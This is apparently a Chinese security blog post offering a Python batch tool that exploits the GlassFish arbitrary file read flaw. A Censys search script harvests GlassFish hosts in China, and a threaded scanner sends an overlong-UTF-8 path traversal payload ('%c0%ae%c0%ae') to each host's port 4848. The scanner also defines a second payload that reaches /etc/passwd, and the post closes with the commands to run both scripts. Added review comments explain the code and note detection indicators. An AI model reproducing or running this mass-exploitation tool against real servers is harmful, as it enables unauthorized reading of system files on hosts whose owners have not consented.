Sh4dow's Blog


GlassFish通用任意文件读取漏洞 python批量工具

这个脚本调用 censys.io 的搜索接口。API key(UID 和 SECRET)需要自己去申请,代码里的值我已经改成了占位符。


import sys

import json

import requests


# Base URL of the Censys v1 REST API; get() appends the endpoint path to it.
API_URL = "https://www.censys.io/api/v1"

# API ID and secret that get() sends as HTTP basic-auth credentials.
# The values shown are placeholders substituted by the author.
# NOTE(review): real credentials are better read from the environment or a
# secrets store than written here, so a published copy of the script does not
# carry them.
UID = "1ad05014-xxx-xxxx-xxxx-xxxxxx"

SECRET = "xxxxxxxxxxxxxxxxxxxxxxxxx"


def get(page):
    """Print one page of Censys IPv4 search results.

    Posts a fixed certificate-field query to the ``/search/ipv4`` endpoint
    with basic auth (``UID``/``SECRET``), prints the raw response body, then
    prints the ``ip`` field of every entry under ``results``.

    ``page`` is coerced with ``int()`` before being sent.

    NOTE(review): the raw JSON body is printed before the IP lines, so output
    redirected to a file contains that body as well as the IP list.
    NOTE(review): no timeout is passed and the HTTP status is not checked; a
    response body without a ``results`` key raises ``KeyError``.
    """
    search_request = {
        "query": "443.https.tls.certificate.parsed.subject.organizational_unit: GlassFish china",
        "page": int(page),
        "fields": ["ip"],
    }
    endpoint = API_URL + "/search/ipv4"
    response = requests.post(
        endpoint,
        data=json.dumps(search_request),
        auth=(UID, SECRET),
    )
    body = response.text
    print(body)
    parsed = json.loads(body)
    for hit in parsed["results"]:
        print("%s" % hit["ip"])

# range(1, 2) yields only 1, so exactly one result page is requested.
for page_number in range(1, 2):
    get(page_number)




'''

python search.py > 1.txt

python GlassFish.py -t 10 1.txt

'''

--------------------------------------------

批量验证:



import threading

import optparse

import Queue

import time

import sys


import requests


# Number of hosts loaded into the work queue; set by main_class.load_queue()
# and used by worker() as the denominator of the progress figure.
MAX_LENGTH=0

# Minimum number of positional command-line arguments (the host-list file).
ARGS_NUM = 1


# Request path that worker() appends to each host. "%c0%ae" is an overlong
# two-byte UTF-8 encoding of ".", so "%c0%ae%c0%ae" stands for ".." on a
# server that accepts overlong encodings. For detection, the literal
# "%c0%ae" in request paths (access logs, WAF/IDS rules) is a usable indicator.
payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'

# Deeper traversal variant of the same path; not referenced anywhere in the
# code shown.
payload2 = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'


# Newline-separated list of hosts whose response matched; appended to by
# worker() threads and printed by main().
x=''



# Threaded checker: queues the hosts listed in ARGS_FILE and has worker threads
# request the module-level `payload` path on port 4848 of each one, recording
# the hosts whose response body contains "Manifest-Version".
class main_class:


    # target: stored on the instance but not read anywhere in this file.
    # thread_num: number of worker threads that main() starts.
    # queue: work queue; filled immediately through load_queue().
    def __init__(self,target,thread_num,queue):

        self.target = target

        self.thread_num = thread_num

        self.queue = queue       


        self.load_queue()

        

    # Reads the file named by the module global ARGS_FILE (assigned in the
    # __main__ block) and queues one entry per line, then records the queue
    # size in MAX_LENGTH. Empty lines are queued as empty host strings, and the
    # file object is not closed explicitly.
    def load_queue(self):            

        global MAX_LENGTH


        list_hosts = open(ARGS_FILE).read().splitlines() 

        for host in list_hosts:

            self.queue.put(host)

        MAX_LENGTH = self.queue.qsize()


    # Writes one progress line: seconds elapsed since self.start_time (set in
    # main()) followed by `what`. The line is left-padded with "*" when it is
    # shorter than 30 characters; a non-positive pad count adds nothing.
    def stdout(self,what):        

        msg = "***%.2f************      %s" %(time.time()-self.start_time,what)

        sys.stdout.write("\r"+"*"*(30 - len(msg))+msg) 

        sys.stdout.flush()

        print ''

    

    # Thread body: takes hosts off the queue while it reports a non-zero size
    # and checks each one.
    def worker(self):

        global MAX_LENGTH

        global x

        

        # NOTE(review): the qsize() test and the blocking get() below are
        # separate steps, so with several threads one can pass the test and
        # then wait in get() on an emptied queue. The threads are daemonic
        # (see main), so that does not keep the process alive.
        while self.queue.qsize() > 0:

            # Progress figure: fraction of the queue already taken.
            self.stdout(1.000-self.queue.qsize()/float(MAX_LENGTH))

            ip = self.queue.get()

            try:

                # verify=False turns off TLS certificate validation for this
                # request; the timeout is 3 seconds.
                # Port 4848 is GlassFish's default admin listener; keeping it
                # off untrusted networks removes this exposure.
                req = requests.get("https://"+ip+":4848"+payload,verify=False,timeout=3)

                # A body containing "Manifest-Version" is taken as evidence
                # that the manifest file was returned.
                if "Manifest-Version" in req.content:

                    # NOTE(review): read-modify-write of a shared global with
                    # no lock between threads.
                    x = x+ip+'\n'

                    # Prints the whole accumulated list, so earlier hits are
                    # repeated each time a new one is found.
                    print x,        

            # Bare except: connection errors, timeouts and any other exception
            # are discarded, so an unreachable host is indistinguishable from a
            # host that did not match.
            except:

                pass

            

            self.queue.task_done() 


    

    # Starts thread_num daemon threads running worker(), blocks until every
    # queued host has been marked done, then prints a final progress line and
    # the accumulated list of matching hosts.
    def main(self):

        # stdout() reads this to compute elapsed time.
        self.start_time = time.time()

                

        for i in range(self.thread_num):

            t = threading.Thread(target = self.worker)

            t.setDaemon(True)

            t.start()

        

        self.queue.join()

        self.stdout(1)

        print x



# Script entry point: parses the command line, stores the host-list path in
# the module global ARGS_FILE and runs the checker.
if __name__ == "__main__":

    # Silences urllib3 warnings, which includes the warning issued for each
    # verify=False request made in worker().
    requests.packages.urllib3.disable_warnings()

    

    # Read by main_class.load_queue(); replaced below with the first
    # positional argument.
    ARGS_FILE = "" 


    queue = Queue.Queue()

    

    parse = optparse.OptionParser("python xxx.py -t 10 filename")

    parse.add_option('-t','--threads',dest='thread_num',

                        default=10,type='int')

    # Parsed but never read: options.verbose is not used in this file.
    parse.add_option('-v','--verbose',dest='verbose',

                        default=False)

    

    options,args = parse.parse_args()

    

    if len(args) < ARGS_NUM:

        # print_help() writes the usage text itself and returns None, so this
        # print statement adds a line reading "None" after it.
        print parse.print_help()     

        sys.exit(-1)


    ARGS_FILE = args[0] 

    

    # Always-true guard; the body runs unconditionally.
    if True:

        

        # target=1 is a dummy value; main_class stores it but never reads it.
        main = main_class(target = 1,thread_num = options.thread_num,queue = queue) 

        main.main()   



'''

python search.py > 1.txt

python GlassFish.py -t 10 1.txt

'''


